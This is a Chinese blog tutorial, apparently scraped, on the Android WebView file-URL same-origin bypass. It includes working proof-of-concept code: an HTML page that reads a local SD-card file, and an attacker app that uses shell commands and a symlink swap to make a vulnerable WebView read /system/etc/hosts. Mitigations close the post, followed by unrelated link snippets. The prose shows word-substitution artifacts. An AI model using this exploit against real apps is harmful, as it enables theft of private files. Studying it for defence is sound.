0x00

    我们首先讲一个webView这种方法的作用:

webView.getSettings().setAllowFileAccessFromFileURLs(false);

    为了解说这种方法,我们还是看一个实际的样例。代码地址还是參考https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo

    代码例如以下。和Android WebView远程代码执行漏洞简析一文中的代码主要差别在于这次载入的attack_file.html。

public class MainActivity extends Activity {

	private WebView webView;

	private Uri mUri;

	private String url;

	String mUrl1 = "file:///android_asset/html/attack_file.html";

	//String mUrl2 = "file:///android_asset/html/test.html";

	@Override

	protected void onCreate(Bundle savedInstanceState) {

		super.onCreate(savedInstanceState);

		setContentView(R.layout.activity_main);

		webView = (WebView) findViewById(R.id.webview);

		webView.getSettings().setJavaScriptEnabled(true);

		webView.addJavascriptInterface(new JSInterface(), "jsInterface");

		webView.getSettings().setAllowFileAccessFromFileURLs(true);

		webView.setWebChromeClient(new WebChromeClient() {

			@Override

			    public boolean onJsAlert(WebView view, String url, String message,JsResult result) {

			    //Required functionality here

			    return super.onJsAlert(view, url, message, result);

			}

		});

		webView.loadUrl(mUrl1);

	}

    class JSInterface {

        public String onButtonClick(String text) {

            final String str = text;

            runOnUiThread(new Runnable() {

                @Override

                public void run() {

                    Log.e("leehong2", "onButtonClick: text = " + str);

                    Toast.makeText(getApplicationContext(), "onButtonClick: text = " + str, Toast.LENGTH_LONG).show();

                }

            });

            return "This text is returned from Java layer.  js text = " + text;

        }

        public void onImageClick(String url, int width, int height) {

            final String str = "onImageClick: text = " + url + "  width = " + width + "  height = " + height;

            Log.i("leehong2", str);

            runOnUiThread(new Runnable() {

                @Override

                public void run() {

                    Toast.makeText(getApplicationContext(), str, Toast.LENGTH_LONG).show();

                }

            });

        }

    }

}

   这里webView.getSettings().setAllowFileAccessFromFileURLs(true)。标示能够通过javaScript訪问file文件。

   我们再来看attack_file.html的代码:

<html>

<body>

<script>

function stealFile()

{

	var file = "file:///mnt/sdcard/11.txt";

	var xmlHttpReq = new XMLHttpRequest();

	xmlHttpReq.onreadystatechange = function(){

		if(xmlHttpReq.readyState == 4){

			alert(xmlHttpReq.responseText);

		}

	}

xmlHttpReq.open("GET", file);

xmlHttpReq.send(null);

}

stealFile();

</script>

</body>

</html>

    因为setAllowFileAccessFromFileURLs为true,所以webView.load这个html能够返回/mnt/sdcard/11.txt的值。

    假设setAllowFileAccessFromFileURLs为false。webView.load这个html不能够返回/mnt/sdcard/11.txt的值。

   0x01

    即使setAllowFileAccessFromFileURLs为false,我们通过一种方式也能够跨过这个限制,那就是Android WebView File域同源策略绕过漏洞浅析。请參考WebView File域同源策略绕过漏洞浅析

    參考的文章并没有给出能够执行的project,这里给出,下面的解说都来源于这两个project:https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo1https://github.com/jltxgcy/AppVulnerability/tree/master/AttackWebView

    首先执行WebViewFileDemo1,然后再执行AttackWebView来突击WebView。

   

    我们首先看WebViewFileDemo1,主要代码例如以下:

package com.example.webviewfiledemo;

import android.app.Activity;

import android.content.Intent;

import android.net.Uri;

import android.os.Bundle;

import android.util.Log;

import android.webkit.JsResult;

import android.webkit.WebChromeClient;

import android.webkit.WebView;

import android.widget.Toast;

public class MainActivity extends Activity {

	private WebView webView;

	private Uri mUri;

	private String url;

	@Override

	protected void onCreate(Bundle savedInstanceState) {

		super.onCreate(savedInstanceState);

		setContentView(R.layout.activity_main);

		webView = (WebView) findViewById(R.id.webview);

		webView.getSettings().setJavaScriptEnabled(true);

		webView.addJavascriptInterface(new JSInterface(), "jsInterface");

		webView.getSettings().setAllowFileAccessFromFileURLs(false);

		//webView.getSettings().setAllowFileAccess(false);

		webView.setWebChromeClient(new WebChromeClient() {

			@Override

			    public boolean onJsAlert(WebView view, String url, String message,JsResult result) {

			    //Required functionality here

			    return super.onJsAlert(view, url, message, result);

			}

		});

		Intent i = getIntent();

		if (i != null) {

			mUri = i.getData();

		}

		if (mUri != null) {

			url = mUri.toString();

		}

		if (url != null) {

			webView.loadUrl(url);

		}

	}

}

    这个Activity接收来自外部的Intent。提取Intent里面的url并载入。

    接着我们来看AttackWebViewproject,这里就是向com.example.webviewfiledemo.MainActivity发送Intent的project。

代码例如以下:

public class MainActivity extends Activity {

	public final static String HTML =

			"<body>" +

		    "<u>Wait a few seconds.</u>" +

		    "<script>" +

		    "var d = document;"+

		    "function doitjs(){"+

		    "var xhr = new XMLHttpRequest;"+

		    "xhr.onload = function(){"+

		    "var txt = xhr.responseText;"+

		    "d.body.appendChild(d.createTextNode(txt));"+

		    "alert(txt);"+"};"+

		    "xhr.open('GET',d.URL);"+

		    "xhr.send(null);"+

		    "}"+

		    "setTimeout(doitjs,8000);"+

		    "</script>"+

		    "</body>";

	public static String MY_TMP_DIR;

	@Override

	protected void onCreate(Bundle savedInstanceState) {

		super.onCreate(savedInstanceState);

		setContentView(R.layout.activity_main);

		MY_TMP_DIR = getDir("payload_odex", MODE_PRIVATE).getAbsolutePath();

		doit();

	}

	public void doit() {

		String HTML_PATH = MY_TMP_DIR + "/A0" + ".html";

		try {

			cmdexec("mkdir " + MY_TMP_DIR);

			cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);

			cmdexec("chmod -R 777 " + MY_TMP_DIR);

			Thread.sleep(1000);

			invokeVulnAPP("file://" + HTML_PATH);

			Thread.sleep(6000);

			cmdexec("rm " + HTML_PATH);

			cmdexec("ln -s " + "/system/etc/hosts" + " " + HTML_PATH);

		} catch (Exception e) {

			// TODO: handle exception

		}

	}

	public void invokeVulnAPP(String url) {

		try {

			Intent intent = new Intent(Intent.ACTION_MAIN,Uri.parse(url));

			intent.addCategory(Intent.CATEGORY_LAUNCHER);

			intent.setClassName("com.example.webviewfiledemo", "com.example.webviewfiledemo.MainActivity");

			startActivity(intent);

		} catch (Exception e) {

			// TODO: handle exception

		}

	}

	public void cmdexec(String cmd) {

		try {

			String[] tmp = new String[] { "/system/bin/sh", "-c", cmd };

			Runtime.getRuntime().exec(tmp);

		} catch (Exception e) {

			// TODO: handle exception

		}

	}

}

   通过invokeVulnAPP,打开了com.example.webviewfiledemo.MainActivity并传递了Intent。

这个Activity提取了Url。Url为/sdcard/payload_odex/A0.html。webView载入了这个html,html内容例如以下: 

	public final static String HTML =

			"<body>" +

		    "<u>Wait a few seconds.</u>" +

		    "<script>" +

		    "var d = document;"+

		    "function doitjs(){"+

		    "var xhr = new XMLHttpRequest;"+

		    "xhr.onload = function(){"+

		    "var txt = xhr.responseText;"+

		    "d.body.appendChild(d.createTextNode(txt));"+

		    "alert(txt);"+"};"+

		    "xhr.open('GET',d.URL);"+

		    "xhr.send(null);"+

		    "}"+

		    "setTimeout(doitjs,8000);"+

		    "</script>"+

		    "</body>";

    当WebViewFileDemo1project中webView载入A0.html后,这个html的作用是延迟8秒读取A0.html本身。我们再回到AttackWebViewproject。往下看代码。 

cmdexec("mkdir " + MY_TMP_DIR);

			cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);

			cmdexec("chmod -R 777 " + MY_TMP_DIR);

			Thread.sleep(1000);

			invokeVulnAPP("file://" + HTML_PATH);

			Thread.sleep(6000);

			cmdexec("rm " + HTML_PATH);

			cmdexec("ln -s " + "/system/etc/hosts" + " " + HTML_PATH);

   调用完invokeVulnAPP后。6秒后,我们首先把A0.html删除,然后再又一次软连接到/system/etc/hosts。

注意此时当WebViewFileDemo1project中webView载入A0.html。这个html的作用是延迟8秒读取A0.html本身。所以8秒后读取的是软连接/system/etc/hosts。

   结果例如以下:

watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQv/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center" alt="" />

   0x02

    怎样避免这样的情况的发生呢?

    1、webView.getSettings. setAllowFileAccess(false);

    假设在WebViewFileDemo1project中com.example.webviewfiledemo.MainActivity的onCreate方法中假设加上了上面的代码,那么执行的结果例如以下:

  

    2、webView.getSettings. setJavaScriptEnabled(false);

Android WebView File域同源策略绕过漏洞浅析的更多相关文章

  1. APP漏洞之WebView File域同源策略绕过漏洞

    i春秋作家:MAX丶 基本知识Android架构 Kernel内核层 漏洞危害极大,通用性强 驱动由于多而杂,也可能存在不少漏洞 Libaries系统运行库层 系统中间件形式提供的运行库 包括libc ...

  2. Android WebView存在跨域访问漏洞(CNVD-2017-36682)介绍及解决

    Android WebView存在跨域访问漏洞(CNVD-2017-36682).攻击者利用该漏洞,可远程获取用户隐私数据(包括手机应用数据.照片.文档等敏感信息),还可窃取用户登录凭证,在受害者毫无 ...

  3. 从跨域与同源策略谈CSRF防御与绕过

    之前偶然看到群里有小伙汁问这个token相关的问题,当时我酝酿了一下子,没想好怎么总结,今天来说一下 CSRF在过去还属于OWASP TOP10 ,现在已经不是了(补充一点:关于OWASP API 请 ...

  4. cors跨域和jsonp劫持漏洞 和 同源策略和跨域请求解决方案

    cors跨域和jsonp劫持漏洞: https://www.toutiao.com/a6759064986984645127/ 同源策略和跨域请求解决方案:https://www.jianshu.co ...

  5. android WebView详解,常见漏洞详解和安全源码

    这篇博客主要来介绍 WebView 的相关使用方法,常见的几个漏洞,开发中可能遇到的坑和最后解决相应漏洞的源码,以及针对该源码的解析.  转载请注明出处:http://blog.csdn.net/se ...

  6. android webview 漏洞背后的节操

    by superhei 2013/09/06 [注:本文提到的都是我个人的观点,该行为也是私人行为,与任何组织.公司无关.另:水军请自重!] 一.前言   这两天,一个2+年前的android web ...

  7. 第二百七十四节,同源策略和跨域Ajax

    同源策略和跨域Ajax 什么是同源策略  尽管浏览器的安全措施多种多样,但是要想黑掉一个Web应用,只要在浏览器的多种安全措施中找到某种措施的一个漏洞或者绕过一种安全措施的方法即可.浏览器的各种保安措 ...

  8. xss利用——BeEF#stage3(绕过同源策略与浏览器代理)

    绕过同源策略 正式进入攻击阶段.因为SOP(同源策略)的存在,BeEF只能对被勾子钩住的页面所在域进行操作.如果有办法绕过SOP,那么无疑会使攻击面放大. 绕过SOP可从两方面入手.第一个是从浏览器本 ...

  9. 开发机上绕过Chrome同源策略的办法

    开发机上绕过Chrome同源策略的办法 标签: Chrome同源策略跨域 2013-08-21 18:33 6071人阅读 评论(0) 收藏 举报  分类: Chrome扩展(1)  版权声明:本文为 ...

随机推荐

  1. HadoopMR-Spark-HBase-Hive

     YARN资源调度: 三种 FIFO 大任务独占 一堆小任务独占 capacity 弹性分配 :计算任务较少时候可以利用全部的计算资源,当队列的任务多的时候会按照比例进行资源平衡. 容量保证:保证队 ...

  2. 用Redis Desktop Manager连接Redis(CentOS)

    Redis Desktop Manager是Redis图形化管理工具,方便管理人员更方便直观地管理Redis数据. 然而在使用Redis Desktop Manager之前,有几个要素需要注意: 一. ...

  3. thinkphp5.0动态配置

    设置配置参数 使用set方法动态设置参数,例如: Config::set('配置参数','配置值'); // 或者使用助手函数 config('配置参数','配置值'); 也可以批量设置,例如: Co ...

  4. eclipse的一些部署

    1. Eclipse导入一个项目Package Exporer-------右键------import------General------Existing Project into Workspa ...

  5. java getenv getProperties区别

    网上很多使用的是getProperties.说获得系统变量,但是其实不正确.getProperties中所谓的"system properties"其实是指"java s ...

  6. Xcode真机调试初体验

    1. 开发者证书(Certificates) 分为开发(iOS Development)和发布(iOS Distribution)两种,无论是真机调试,还是上传到App Store都需要该证书,是一个 ...

  7. 【UOJ #107】【APIO 2013】ROBOTS

    http://uoj.ac/problem/107 设\(f(l,r,i,j)\)表示\([l,r]\)中的机器人聚集到\((i,j)\)需要花的最小操作数. \(f(l,r,i,j)=\min\le ...

  8. Java高级架构师(一)第43节:Varnish简介、安装和基本使用

    第一部分:Varnish简介 Varnish是一款开源的.高性能的HTTP加速器和反向代理服务器. Varnish反向代理的能力远不如Nginx. Varnish主要作用是HTTP的加速器,主要通过缓 ...

  9. HDU 5301 Buildings 数学

    Buildings 题目连接: http://acm.hdu.edu.cn/showproblem.php?pid=5301 Description Your current task is to m ...

  10. [原]Redis使用场景及使用经验

    Redis is an open source (BSD licensed), in-memory data structure store! 欢迎转载,转载请注明出处 刚刚结束一个游戏类的活动项目, ...